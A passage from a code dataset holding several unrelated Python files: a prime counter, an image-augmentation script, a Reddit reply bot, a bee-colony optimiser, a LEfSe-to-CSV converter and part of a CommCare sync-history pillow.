possible primes\r\n# # mult = [] # multiples of primes\r\n\r\n# # # Loop to append successors to list until r2 is reached.\r\n# # while r1 < r2 + 1:\r\n# # res.append(r1)\r\n# # r1 += 1\r\n\r\n# # # Extract all multiples of 6 from reserve list\r\n# # multiples_6 = [n for n in res if n % 6 == 0]\r\n\r\n# # # Create list with + 1 and - 1 values from each multiple of 6\r\n# # # because these are the only numbers that can be prime\r\n# # for val in multiples_6:\r\n# # poss.append(val - 1)\r\n# # poss.append(val + 1)\r\n\r\n# # # Create list of multiples with all possible combinations of elements\r\n# # # in the possible list, unless that value exceeds r2\r\n# # start = 0\r\n\r\n# # for i in range(len(poss)):\r\n# # for y in range(i, len(poss)):\r\n# # val = poss[i] * poss[y]\r\n# # upper_limit = r2\r\n# # if val <= upper_limit and val not in mult:\r\n# # mult.append(val)\r\n# # elif val >= upper_limit:\r\n# # break\r\n# # if val >= upper_limit * 2:\r\n# # break\r\n\r\n# # # Subtract the amount of multiples from the amount of possible primes,\r\n# # # add 2 (for 2 and 3), and this is the amount of primes up to upper_limit\r\n# # return len(poss) - len(mult) + 2\r\n\r\n\r\n# # def main():\r\n# # exit = \"N\"\r\n\r\n# # while exit.upper() != \"Y\":\r\n\r\n# # # Driver Code\r\n# # r1, r2 = 2, int(input(\"Enter an integer: \")),\r\n# # start = time.time()\r\n\r\n# # print(create_list(r1, r2))\r\n\r\n# # end = time.time()\r\n# # print('Time ', end - start)\r\n\r\n# # exit = input(\"Would you like to exit? 
(Y/N)\")\r\n\r\n\r\n# # if __name__ == \"__main__\":\r\n# # main()\r\n\r\n\r\ndef create_and_count(n):\r\n # Create list of all multiples of 6 up to n\r\n multiples_6 = [x for x in range(2, n+1) if x % 6 == 0]\r\n \r\n # Create list of all numbers 1 more or 1 less than a multiple of 6 (possible primes)\r\n poss = [val + delta for val in multiples_6 for delta in (-1, 1) if val + delta <= n]\r\n \r\n # Create list of all products of possible primes (multiples)\r\n mult = [i * j for i_index, i in enumerate(poss) for j in poss[i_index:] if i * j <= n]\r\n \r\n # Number of primes is difference of possible primes and multiples, plus 2 (for 2 and 3)\r\n return len(poss) - len(set(mult)) + 2\r\n\r\n\r\ndef main():\r\n exit = \"N\"\r\n\r\n while exit.upper() != \"Y\":\r\n\r\n n = int(input(\"Enter an integer: \"))\r\n start = time.time()\r\n\r\n print(create_and_count(n))\r\n # print(create_and_count(100)) # Should print 25\r\n # print(create_and_count(1000)) # Should print 168\r\n # print(create_and_count(10000)) # Should print 1229\r\n # print(create_and_count(100000)) # Should print 9592\r\n\r\n end = time.time()\r\n print('Time ', end - start)\r\n\r\n exit = input(\"Would you like to exit? 
(Y/N)\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Primes/pCount.py","file_name":"pCount.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164362337","text":"import argparse\nimport ast\nimport itertools\nimport os\n\nimport cv2\nimport numpy as np\nfrom scipy import ndimage\nimport random\n\nimport imgaug as ia\nfrom imgaug import augmenters as iaa\n\n\ndef _list_to_str(lst):\n \"\"\"Convert a list to string.\n\n Elements are separated by comma, without any spaces inserted in between\n \"\"\"\n\n if type(lst) is not list:\n return str(lst)\n\n return '[' + ','.join(_list_to_str(elem) for elem in lst) + ']'\n\ndef rotate_point(x, y, angle):\n t = -np.radians(angle) # radian\n nx = int(x * np.cos(t) - y * np.sin(t))\n ny = int(x * np.sin(t) + y * np.cos(t))\n return (nx, ny)\n\n\ndef flip_bbox_horizontal(img_w, img_h, angle):\n def f(bbox, modified_image, arg):\n tmp = bbox[0]\n bbox[0] = img_w - bbox[2]\n bbox[2] = img_w - tmp\n return bbox\n\n return f\n\n\ndef flip_bbox_vertical(img_w, img_h, angle):\n def f(bbox, modified_image, arg):\n tmp = bbox[1]\n bbox[1] = img_h - bbox[3]\n bbox[3] = img_h - tmp\n return bbox\n\n return f\n\n\ndef rotate_bbox_angle(img_w, img_h, angle):\n def f(bbox, modified_image, arg):\n x_pos, y_pos = [], []\n for x, y in itertools.product([bbox[0], bbox[2]], [bbox[1], bbox[3]]):\n nx, ny = rotate_point(x - img_w / 2, y - img_h / 2, angle)\n nx += modified_image.shape[1] // 2\n ny += modified_image.shape[0] // 2\n x_pos.append(nx)\n y_pos.append(ny)\n\n bbox[0] = min(x_pos)\n bbox[2] = max(x_pos)\n bbox[1] = min(y_pos)\n bbox[3] = max(y_pos)\n return bbox\n\n return f\n\n\ndef flip_polygon_horizontal(img_w, img_h, angle):\n def f(polygon, modified_image, arg):\n for i in range(0, len(polygon), 2):\n polygon[i] = img_w - polygon[i]\n return polygon\n\n return f\n\n\ndef flip_polygon_vertical(img_w, img_h, 
angle):\n def f(polygon, modified_image, arg):\n for i in range(1, len(polygon), 2):\n polygon[i] = img_h - polygon[i]\n return polygon\n\n return f\n\n\ndef rotate_polygon_angle(img_w, img_h, angle):\n def f(polygon, modified_image, arg):\n for i in range(0, len(polygon), 2):\n x, y = polygon[i], polygon[i + 1]\n nx, ny = rotate_point(x - img_w / 2, y - img_h / 2, angle)\n nx += modified_image.shape[1] // 2\n ny += modified_image.shape[0] // 2\n polygon[i], polygon[i + 1] = nx, ny\n return polygon\n\n return f\n\ndef make_random_sequential():\n seq = iaa.Sequential([\n iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)},\n rotate=(-45, 45),\n shear=(-16, 16),\n order=[0, 1],\n cval=(0, 255),\n mode=ia.ALL\n )\n ])\n seq_det = seq._to_deterministic()\n return seq_det\n\ndef make_noise_sequential():\n seqw = iaa.Sequential([\n\n ])\n\n\ndef random_bbox_transform(img_w, img_h, angle):\n def f(bbox, modified_image, seq_det):\n\n bbox_on_image = ia.BoundingBoxesOnImage.from_xyxy_array(np.float32([bbox]), shape=(img_h, img_w))\n\n bbox_on_image = seq_det.augment_bounding_boxes([bbox_on_image])[0]\n\n bbox = bbox_on_image.to_xyxy_array()[0].astype(np.int32).tolist()\n\n bbox[0] = max(0, min(img_w, bbox[0]))\n bbox[1] = max(0, min(img_h, bbox[1]))\n bbox[2] = max(0, min(img_w, bbox[2]))\n bbox[3] = max(0, min(img_h, bbox[3]))\n print(bbox)\n\n return bbox\n return f\n\n\ndef random_polygon_transform(img_w, img_h, angle):\n def f(polygon, modified_image, seq_det):\n\n poly = []\n for i in range(0, len(polygon), 2):\n poly.append( (polygon[i], polygon[i+1]) )\n \"\"\"\n poly_x.append(polygon[i])\n poly_y.append(polygon[i + 1])\n \"\"\"\n # rewrite for imgarg 0.2.8\n poly_on_image = ia.PolygonsOnImage([ia.Polygon(poly)], shape=(img_h, img_w))\n poly_on_image = seq_det.augment_polygons([poly_on_image])[0]\n\n moved_poly = poly_on_image.polygons[0]\n for i, (x, y) in enumerate(zip(moved_poly.xx, 
moved_poly.yy)):\n polygon[2 * i] = x\n polygon[2 * i + 1] = y\n\n return polygon\n return f\n\n\ndef rotate_image(angle, image):\n if angle == 0:\n return image\n elif angle == 180:\n return cv2.flip(image, -1)\n\n h, w, _ = image.shape\n t = np.radians(angle)\n h_ = abs(h * np.cos(t)) + abs(w * np.sin(t)) # rotate image size\n w_ = abs(w * np.cos(t)) + abs(h * np.sin(t))\n\n image_top = image[:1, :, :]\n image_top = cv2.resize(image_top, (w, w))\n image_bottom = image[h - 1:, :, :]\n image_bottom = cv2.resize(image_bottom, (w, w))\n image_center = cv2.vconcat([image_top, image, image_bottom])\n\n blank_shape = (w, h, 3)\n blank = np.zeros(blank_shape, dtype=np.uint8)\n\n image_left = image[:, :1, :]\n image_left = cv2.resize(image_left, (h, h))\n image_left = cv2.vconcat([blank, image_left, blank])\n\n image_right = image[:, w - 1:, :]\n image_right = cv2.resize(image_right, (h, h))\n image_right = cv2.vconcat([blank, image_right, blank])\n\n image = cv2.hconcat([image_left, image_center, image_right])\n image = ndimage.rotate(image, angle, reshape=True)\n bh, bw, _ = image.shape\n image = image[int((bh - h_) / 2):int((bh + h_) / 2),\n int((bw - w_) / 2):int((bw + w_) / 2), :]\n return image\n\n\ndef change_object_color(img, mask):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n r = random.randint(0, 255)\n img[:,:,0] += r\n img[:,:,0] %= 256\n img = cv2.cvtColor(img, cv2.COLOR_HSV2BGR)\n\n res_img = img.copy()\n\n res_img = cv2.cvtColor(res_img, cv2.COLOR_BGR2HSV)\n r = random.randint(0, 255)\n res_img[:,:,0] += r\n res_img[:,:,0] %= 256\n res_img = cv2.cvtColor(res_img, cv2.COLOR_HSV2BGR)\n res_img = np.where(mask==255, res_img, img)\n return res_img\n\n\ndef rotate_image_and_annotation(img,\n areas,\n bbox_transform_function,\n class_names,\n object_type=None,\n horizontal=False,\n vertical=False,\n angle=None,\n affin=False,\n trans_color=False):\n arg = None\n if horizontal:\n rotated_img = cv2.flip(img, 1)\n elif vertical:\n rotated_img = cv2.flip(img, 0)\n 
elif angle is not None:\n rotated_img = rotate_image(angle, img)\n else:\n arg = make_random_sequential()\n rotated_img = arg.augment_images([img.copy()])[0]\n\n\n annotation = []\n\n img_mask = img = np.zeros(list(img.shape), dtype=np.uint8)\n box_list = []\n class_list = []\n for obj_area in areas:\n\n if \"[\" in obj_area:\n assert object_type == \"polygon\"\n\n boxes, class_id = ast.literal_eval(obj_area)\n boxes = [\n bbox_transform_function(box, rotated_img, arg) for box in boxes\n ]\n for box in boxes:\n poly = np.array([(x, y) for x, y in zip(box[::2], box[1::2])]).astype(np.int32)\n cv2.fillPoly(\n img_mask,\n pts = [poly],\n color = (255, 255, 255))\n box_list.append(boxes)\n else:\n *box, class_id = map(int, obj_area.split(','))\n box = bbox_transform_function(box, rotated_img, arg)\n if object_type == \"polygon\":\n poly = np.array([(x, y) for x, y in zip(box[::2], box[1::2])]).astype(np.int32)\n cv2.fillPoly(\n img_mask,\n pts = [poly],\n color = (255, 255, 255))\n boxes = [box]\n del box\n box_list.append(boxes)\n else:\n cv2.rectangle(\n img_mask, (box[0], box[1]), (box[2], box[3]),\n (255, 255, 255),\n thickness=-1,\n lineType=cv2.LINE_AA)\n box_list.append(box)\n class_list.append(class_id)\n\n if trans_color:\n rotated_img = change_object_color(rotated_img, img_mask)\n annotated_img = rotated_img.copy()\n\n for obj, class_id in zip(box_list, class_list):\n if object_type == \"bbox\":\n box = obj\n cv2.rectangle(\n annotated_img, (box[0], box[1]), (box[2], box[3]),\n (255, 255, 255),\n thickness=2,\n lineType=cv2.LINE_AA)\n cv2.putText(annotated_img, class_names[class_id], (box[0], box[1]),\n cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 255), 2,\n cv2.LINE_AA)\n annotation.append((box, class_id))\n else:\n boxes = obj\n cv2.polylines(\n annotated_img,\n [np.reshape(box, (-1, 2)).astype(np.int32) for box in boxes],\n isClosed=True,\n color=(255, 0, 0),\n thickness=2,\n )\n for box in boxes:\n cv2.putText(annotated_img, class_names[class_id],\n (box[0], 
box[1]), cv2.FONT_HERSHEY_PLAIN, 1,\n (255, 255, 255), 2, cv2.LINE_AA)\n annotation.append((boxes, class_id))\n\n return rotated_img, annotated_img, annotation\n\n\ndef rotate(annotations_path,\n horizontal=None,\n vertical=None,\n affine=None,\n angle=None,\n trans_color=False,\n numbers_of_trans=100):\n\n horizontal = bool(horizontal)\n vertical = bool(vertical)\n affine = bool(affine)\n if angle is not None:\n angle = int(angle)\n\n basedir = os.path.dirname(annotations_path)\n\n with open(annotations_path) as f:\n annotations = [f_line.split() for f_line in f][:numbers_of_trans]\n\n\n if len(annotations[0][1].split(',')) == 5:\n object_type = 'bbox'\n else:\n object_type = 'polygon'\n\n if horizontal:\n suf = \"_h\"\n bbox_transform_function_factory = flip_bbox_horizontal if object_type == 'bbox' else flip_polygon_horizontal\n elif vertical:\n suf = \"_v\"\n bbox_transform_function_factory = flip_bbox_vertical if object_type == 'bbox' else flip_polygon_vertical\n elif angle is not None:\n suf = \"_a\" + str(angle)\n bbox_transform_function_factory = rotate_bbox_angle if object_type == 'bbox' else rotate_polygon_angle\n else:\n suf = \"_t\"\n bbox_transform_function_factory = random_bbox_transform if object_type == 'bbox' else random_polygon_transform\n \n if trans_color is not False:\n suf = suf + \"_c\"\n\n classes_path = os.path.join(basedir, \"classes.txt\")\n new_annotations_path = suf.join(os.path.splitext(annotations_path))\n with open(classes_path) as f:\n class_names = [c.strip() for c in f]\n\n annotations_ = []\n for i, data in enumerate(annotations):\n img_file, areas = data[0], data[1:]\n\n img_file_name = os.path.basename(img_file)\n\n img = cv2.imread(img_file)\n\n if bbox_transform_function_factory is not None:\n bbox_transform_function = bbox_transform_function_factory(\n img.shape[1], img.shape[0], angle)\n\n\n (rotated_img, annotated_img,\n annotation) = rotate_image_and_annotation(\n img, areas, bbox_transform_function, class_names, 
object_type,\n horizontal, vertical, angle, affine, trans_color)\n\n new_img_dir = os.path.dirname(img_file) + suf\n os.makedirs(new_img_dir, exist_ok=True)\n img_new_file = os.path.join(new_img_dir, img_file_name)\n cv2.imwrite(img_new_file, rotated_img)\n\n print(img_new_file)\n annotations_.append((img_new_file, annotation))\n\n verbose_dir = os.path.dirname(img_file) + suf + \"_annot\"\n os.makedirs(verbose_dir, exist_ok=True)\n cv2.imwrite(\n os.path.join(verbose_dir, img_file_name), annotated_img)\n\n with open(new_annotations_path, mode='w') as f:\n for img_filepath, annotation in annotations_:\n if object_type == \"bbox\":\n print(\n img_filepath,\n \" \".join(\"{box},{class_id}\".format(\n box=\",\".join(map(str, box)),\n class_id=class_id,\n ) for box, class_id in annotation),\n file=f,\n )\n else:\n print(\n img_filepath,\n \" \".join(\"{polygons},{class_id}\".format(\n polygons=_list_to_str(polygons),\n class_id=class_id,\n ) for polygons, class_id in annotation),\n file=f,\n )\n\n print(new_img_dir)\n print(new_annotations_path)\n\n\ndef _main():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n parser.add_argument('-a', '--annotations_path', required=True)\n group.add_argument('-ho', '--horizontal', action='store_true')\n group.add_argument('-ve', '--vertical', action='store_true')\n group.add_argument('-ang', '--angle', type=int)\n group.add_argument('-af', '--affine_transform', action='store_true')\n parser.add_argument('-c', '--trans_color', action='store_true')\n parser.add_argument('-n', '--numbers_of_trans', type=int, default=100)\n\n args = parser.parse_args()\n rotate(\n args.annotations_path,\n horizontal=args.horizontal,\n vertical=args.vertical,\n affine=args.affine_transform,\n angle=args.angle,\n trans_color=args.trans_color,\n numbers_of_trans=args.numbers_of_trans\n )\n\n\nif __name__ == '__main__':\n 
_main()\n","sub_path":"scripts/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":13926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252956569","text":"import os\nimport praw\nimport threading\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nreddit = praw.Reddit(\n client_id=os.getenv(\"CLIENT_ID\"),\n client_secret=os.getenv(\"CLIENT_SECRET\"),\n password=os.getenv(\"PASSWORD\"),\n user_agent=os.getenv(\"USER_AGENT\"),\n username=os.getenv(\"REDDIT_USERNAME\"),\n)\n\n\ndef start():\n while True:\n check_witnesses_thread = threading.Thread(target=check_witnesses())\n check_witnesses_thread.start()\n\n check_replies_thread = threading.Thread(target=check_replies())\n check_replies_thread.start()\n\n\ndef check_witnesses():\n witness_words = [\"Witness me!\", \"Witness me\"]\n for comment in reddit.subreddit(\"test\").stream.comments():\n count = 0\n comment_body = comment.body.strip()\n if any(witness.lower() in comment_body.lower() for witness in witness_words):\n print(\"String with \\\"sample user comment\\\" found in comment \" + comment.id)\n comment.reply(\"Witness!\")\n count += 1\n print(\"Replied to comment \" + comment.id)\n print(\"Comments replied to: {}\".format(count))\n\n\ndef check_replies():\n print(\"Checking for replies\")\n good_bot_words = [\"goodbot\", \"good bot\", \"goodbot!\", \"good bot!\"]\n local_count = 0\n for comment in reddit.inbox.unread(limit=None):\n comment_body = comment.body.strip()\n if any(goodbot.lower() in comment_body.lower() for goodbot in good_bot_words):\n print(\"Found someone who appreciates the bot!\")\n comment.reply(\"I have witnessed {} witnesses.\".format(1))\n comment.mark_read()\n print(\"Comments replied to: {}\".format(local_count))\n\n\nif __name__ == '__main__':\n 
start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"198531134","text":"import numpy as np\n\n\n# This code was based on in the following references:\n# [1] \"On clarifying misconceptions when comparing variants of the Artificial FoodSource Colony Algorithm by offering a new\n# implementation\" published in 2015 by Marjan Mernik, Shih-Hsi Liu, Dervis Karaboga and Matej Crepinsek\n# [2] \"A modified Artificial FoodSource Colony algorithm for real-parameter optimization\" published in 2010 by\n# Bahriye Akay and Dervis Karaboga\n\n# This implementation consider #_employed = #_onlookers = #_food_sources = colony_size / 2\n\nclass FoodSource(object):\n def __init__(self, dim):\n nan = float('nan')\n self.pos = [nan for _ in range(dim)]\n self.cost = np.inf\n self.fitness = 0.0\n self.prob = 0.0\n self.trials = 0\n\n\nclass ABC(object):\n def __init__(self, objective_function, n_iter=1000, n_eval=None, dim=30, colony_size=30, trials_limit=100):\n\n self.objective_function = objective_function.function\n\n self.dim = dim\n self.minf = objective_function.minf\n self.maxf = objective_function.maxf\n self.metric_type = objective_function.metric_type\n self.n_iter = n_iter\n self.n_eval = n_eval\n\n self.gbest = None\n self.optimum_cost_tracking_iter = []\n self.optimum_cost_tracking_eval = []\n\n self.num_fs = int(colony_size / 2)\n self.trials_limit = trials_limit\n self.food_sources = []\n\n def __str__(self):\n return 'ABC'\n\n @staticmethod\n def calculate_fitness(cost):\n if cost >= 0:\n result = 1.0 / (1.0 + cost)\n else:\n result = 1.0 + abs(cost)\n return result\n\n def calculate_probabilities(self):\n sum_fit = 0.0\n for fs in range(self.num_fs):\n sum_fit += self.food_sources[fs].fitness\n\n for fs in range(self.num_fs):\n self.food_sources[fs].prob = (\n self.food_sources[fs].fitness / sum_fit)\n\n def 
update_best_solution(self):\n for fs in self.food_sources:\n if fs.cost < self.gbest.cost:\n self.gbest.pos = fs.pos\n self.gbest.cost = fs.cost\n\n def init_fs(self, pos):\n fs = FoodSource(self.dim)\n fs.pos = pos\n fs.cost = self.objective_function(fs.pos)\n self.optimum_cost_tracking_eval.append(self.gbest.cost)\n fs.fitness = self.calculate_fitness(fs.cost)\n return fs\n\n def init_colony(self):\n self.food_sources = []\n self.gbest = FoodSource(self.dim)\n self.gbest.cost = np.inf\n\n for i in range(self.num_fs):\n rand = np.random.random(self.dim)\n\n fs = self.init_fs(self.minf + rand * (self.maxf - self.minf))\n self.food_sources.append(fs)\n\n if fs.cost < self.gbest.cost:\n self.gbest.pos = fs.pos\n self.gbest.cost = fs.cost\n\n def employed_bee_phase(self):\n for fs in range(self.num_fs):\n k = list(range(self.num_fs))\n k.remove(fs)\n k = np.random.choice(np.array(k))\n j = np.random.choice(range(self.dim))\n phi = np.random.uniform(-1, 1)\n\n new_pos = np.copy(self.food_sources[fs].pos)\n new_pos[j] = self.food_sources[fs].pos[j] + phi * (\n self.food_sources[fs].pos[j] - self.food_sources[k].pos[j])\n\n if new_pos[j] < self.minf:\n new_pos[j] = self.minf\n elif new_pos[j] > self.maxf:\n new_pos[j] = self.maxf\n cost = self.objective_function(new_pos)\n self.optimum_cost_tracking_eval.append(self.gbest.cost)\n fit = self.calculate_fitness(cost)\n\n if self.metric_type == 'min':\n if fit > self.food_sources[fs].fitness:\n self.food_sources[fs].pos = new_pos\n self.food_sources[fs].cost = cost\n self.food_sources[fs].fitness = fit\n self.food_sources[fs].trials = 0\n else:\n self.food_sources[fs].trials += 1\n else:\n if fit < self.food_sources[fs].fitness:\n self.food_sources[fs].pos = new_pos\n self.food_sources[fs].cost = cost\n self.food_sources[fs].fitness = fit\n self.food_sources[fs].trials = 0\n else:\n self.food_sources[fs].trials += 1\n\n def onlooker_bee_phase(self):\n t = s = 0\n while t < self.num_fs:\n s = (s + 1) % self.num_fs\n r = 
np.random.uniform()\n if self.metric_type == 'min':\n if r < self.food_sources[s].prob:\n t += 1\n\n k = list(range(self.num_fs))\n k.remove(s)\n k = np.random.choice(np.array(k))\n j = np.random.choice(range(self.dim))\n phi = np.random.uniform(-1, 1)\n\n new_pos = np.copy(self.food_sources[s].pos)\n new_pos[j] = new_pos[j] + phi * \\\n (new_pos[j] - self.food_sources[k].pos[j])\n\n if new_pos[j] < self.minf:\n new_pos[j] = self.minf\n elif new_pos[j] > self.maxf:\n new_pos[j] = self.maxf\n cost = self.objective_function(new_pos)\n self.optimum_cost_tracking_eval.append(self.gbest.cost)\n fit = self.calculate_fitness(cost)\n\n if fit > self.food_sources[s].fitness and (self.food_sources[s].cost - cost) >= 0.0001:\n self.food_sources[s].pos = new_pos\n self.food_sources[s].cost = cost\n self.food_sources[s].fitness = fit\n self.food_sources[s].trials = 0\n else:\n self.food_sources[s].trials += 1\n else:\n if r > self.food_sources[s].prob:\n t += 1\n\n k = list(range(self.num_fs))\n k.remove(s)\n k = np.random.choice(np.array(k))\n j = np.random.choice(range(self.dim))\n phi = np.random.uniform(-1, 1)\n\n new_pos = np.copy(self.food_sources[s].pos)\n new_pos[j] = new_pos[j] + phi * \\\n (new_pos[j] - self.food_sources[k].pos[j])\n\n if new_pos[j] < self.minf:\n new_pos[j] = self.minf\n elif new_pos[j] > self.maxf:\n new_pos[j] = self.maxf\n cost = self.objective_function(new_pos)\n self.optimum_cost_tracking_eval.append(self.gbest.cost)\n fit = self.calculate_fitness(cost)\n\n if fit < self.food_sources[s].fitness and (self.food_sources[s].cost - cost) >= 0.0001:\n self.food_sources[s].pos = new_pos\n self.food_sources[s].cost = cost\n self.food_sources[s].fitness = fit\n self.food_sources[s].trials = 0\n else:\n self.food_sources[s].trials += 1\n\n def get_max_trial(self):\n max_ = 0\n for fs in range(self.num_fs):\n if self.food_sources[fs].trials > self.food_sources[max_].trials:\n max_ = fs\n return max_\n\n def scout_bee_phase(self):\n max_ = 
self.get_max_trial()\n\n if self.food_sources[max_].trials >= self.trials_limit:\n rand = np.random.random(self.dim)\n pos = self.minf + rand * (self.maxf - self.minf)\n self.food_sources[max_] = self.init_fs(pos)\n\n def optimize(self):\n self.optimum_cost_tracking_eval = []\n self.optimum_cost_tracking_iter = []\n\n self.init_colony()\n self.update_best_solution()\n\n range_sim = self.n_iter\n tracking = self.optimum_cost_tracking_iter\n\n if self.n_eval is not None:\n range_sim = self.n_eval\n tracking = self.optimum_cost_tracking_eval\n\n while tracking.__len__() < range_sim:\n self.employed_bee_phase()\n self.calculate_probabilities()\n self.onlooker_bee_phase()\n self.update_best_solution()\n self.scout_bee_phase()\n self.optimum_cost_tracking_iter.append(self.gbest.cost)\n # print('{} - {} - {}'.format(self.optimum_cost_tracking_iter.__len__(),\n # self.optimum_cost_tracking_eval.__len__(),\n # self.gbest.cost))\n\n","sub_path":"algorithms/optimization/ABC.py","file_name":"ABC.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"575761832","text":"\n# coding: utf-8\n\n# **TURNING THE LEfSe TABLE IN A BETTER LOOKING PLOT - GENERATING AN R INPUT FILE**\n\n# In[3]:\n\nl = open('/Volumes/group_dv/personal/DValenzano/month-by-month/Feb2016/uBiome_paper/Figure2/LEfSe.txt', 'rU').read()\nl = l.replace('\\t',',')\n\n\n# In[6]:\n\nl1 = [ i for i in l.split('\\n')[:-1] if i.split(',')[2] != '']\n\n\n# In[20]:\n\nl1_old = [i for i in l1 if i.split(',')[2][0] == 'o']\nl1_young = [i for i in l1 if i.split(',')[2][0] == 'y']\n\n\n# In[21]:\n\nl1_old_s = sorted(l1_old, key = lambda x: (x.split(',')[-2]))\nl1_young_s = sorted(l1_young, key = lambda x: (x.split(',')[-2]))[::-1]\n\n\n# In[30]:\n\nl2 = 'GO,value1,group,LDA,p-value\\n'+','.join([ i+'\\n' for i in l1_young_s]).replace('\\n,','\\n')+','.join([ i+'\\n' for i in l1_old_s]).replace('\\n,','\\n')\n\n\n# In[31]:\n\nz = 
open('/Volumes/group_dv/personal/DValenzano/month-by-month/Feb2016/uBiome_paper/Figure2/lefse.csv', 'w')\nz.write(l2)\nz.close()\n\n\n# Now the same, for figure 4\n\n# In[70]:\n\nl_4 = open('/Volumes/group_dv/personal/DValenzano/month-by-month/Feb2016/uBiome_paper/Figure4/LEfSe.txt', 'rU').read()\nl_4 = l_4.replace('\\t',',')\nl_4_1 = [ i for i in l_4.split('\\n')[:-1] if i.split(',')[2] != '']\n\n\n# In[73]:\n\nl_4_1_old = [i for i in l_4_1 if i.split(',')[2].split('_')[1][-1] == 'd']\nl_4_1_young = [i for i in l_4_1 if i.split(',')[2].split('_')[1][-1] == 'g']\nl411_old_s = sorted(l_4_1_old, key = lambda x: (x.split(',')[-2]))\nl411_young_s = sorted(l_4_1_young, key = lambda x: (x.split(',')[-2]))[::-1]\n\n\n# In[74]:\n\nl42 = 'GO,value1,group,LDA,p-value\\n'+','.join([ i+'\\n' for i in l411_young_s]).replace('\\n,','\\n')+','.join([ i+'\\n' for i in l411_old_s]).replace('\\n,','\\n')\nz = open('/Volumes/group_dv/personal/DValenzano/month-by-month/Feb2016/uBiome_paper/Figure4/lefse.csv', 'w')\nz.write(l42)\nz.close()\n\n\n# In[ ]:\n\n\n\n","sub_path":"23-Feb-2016.py","file_name":"23-Feb-2016.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"274024596","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom casexml.apps.phone.dbaccessors.sync_logs_by_user import get_synclogs_for_user\nfrom corehq.apps.change_feed import topics\nfrom corehq.apps.change_feed.consumer.feed import KafkaChangeFeed, KafkaCheckpointEventHandler\nfrom corehq.apps.receiverwrapper.util import get_version_and_app_from_build_id\nfrom corehq.apps.users.models import CouchUser, CommCareUser, WebUser, DeviceAppMeta\nfrom corehq.apps.users.util import update_latest_builds, update_last_sync, update_device_meta\nfrom corehq.util.doc_processor.interface import BaseDocProcessor, DocumentProcessorController\nfrom 
corehq.util.doc_processor.couch import CouchDocumentProvider\n\nfrom dimagi.utils.parsing import string_to_utc_datetime\n\nfrom pillowtop.pillow.interface import ConstructedPillow\nfrom pillowtop.processors.interface import PillowProcessor\nfrom pillowtop.feed.interface import Change\nfrom pillowtop.checkpoints.manager import KafkaPillowCheckpoint\nfrom pillowtop.reindexer.reindexer import Reindexer, ReindexerFactory\n\n\nSYNCLOG_SQL_USER_SYNC_GROUP_ID = \"synclog_sql_user_sync\"\n\n\ndef get_user_sync_history_pillow(\n pillow_id='UpdateUserSyncHistoryPillow', num_processes=1, process_num=0, **kwargs):\n \"\"\"\n This gets a pillow which iterates through all synclogs\n \"\"\"\n change_feed = KafkaChangeFeed(\n topics=[topics.SYNCLOG_SQL], group_id=SYNCLOG_SQL_USER_SYNC_GROUP_ID,\n num_processes=num_processes, process_num=process_num)\n checkpoint = KafkaPillowCheckpoint(pillow_id, [topics.SYNCLOG_SQL])\n return ConstructedPillow(\n name=pillow_id,\n checkpoint=checkpoint,\n change_feed=change_feed,\n processor=UserSyncHistoryProcessor(),\n change_processed_event_handler=KafkaCheckpointEventHandler(\n checkpoint=checkpoint, checkpoint_frequency=100, change_feed=change_feed\n ),\n )\n\n\nclass UserSyncHistoryProcessor(PillowProcessor):\n\n def process_change(self, pillow_instance, change):\n synclog = change.get_document()\n if not synclog:\n return\n\n version = None\n app_id = None\n try:\n sync_date = string_to_utc_datetime(synclog.get('date'))\n except (ValueError, AttributeError):\n return\n build_id = synclog.get('build_id')\n if build_id:\n version, app_id = get_version_and_app_from_build_id(synclog.get('domain'), build_id)\n user_id = synclog.get('user_id')\n\n if user_id:\n user = CouchUser.get_by_user_id(user_id)\n save = update_last_sync(user, app_id, sync_date, version)\n if version:\n save |= update_latest_builds(user, app_id, sync_date, version)\n\n app_meta = None\n device_id = synclog.get('device_id')\n if device_id:\n if app_id:\n app_meta = 
DeviceAppMeta(app_id=app_id, build_id=build_id, last_sync=sync_date)\n save |= update_device_meta(user, device_id, device_app_meta=app_meta, save=False)\n\n if save:\n user.save(fire_signals=False)\n\n\nclass UserSyncHistoryReindexerDocProcessor(BaseDocProcessor):\n\n def __init__(self, pillow_processor):\n self.pillow_processor = pillow_processor\n\n def process_doc(self, doc):\n synclog_changes = self._doc_to_changes(doc)\n for change in synclog_changes:\n try:\n self.pillow_processor.process_change(None, change)\n except Exception:\n return False\n return True\n\n def handle_skip(self, doc):\n print('Unable to process user {}'.format(\n doc['_id'],\n ))\n return True\n\n def _doc_to_changes(self, doc):\n # creates a change object for the last 10 synclogs\n # of the given user, for the synclog pillow to process.\n # this means we wont have to iterate through all synclogs\n # when reindexing.\n synclogs = get_synclogs_for_user(doc['_id'], limit=10)\n changes = [Change(\n id=res['doc']['_id'],\n sequence_id=None,\n document=res['doc']\n ) for res in synclogs]\n return changes\n\n\nclass UserSyncHistoryReindexer(Reindexer):\n\n def __init__(self, doc_provider, chunk_size=1000, reset=False):\n self.reset = reset\n self.doc_provider = doc_provider\n self.chunk_size = chunk_size\n self.doc_processor = UserSyncHistoryReindexerDocProcessor(UserSyncHistoryProcessor())\n\n def reindex(self):\n processor = DocumentProcessorController(\n self.doc_provider,\n self.doc_processor,\n reset=self.reset,\n chunk_size=self.chunk_size,\n )\n 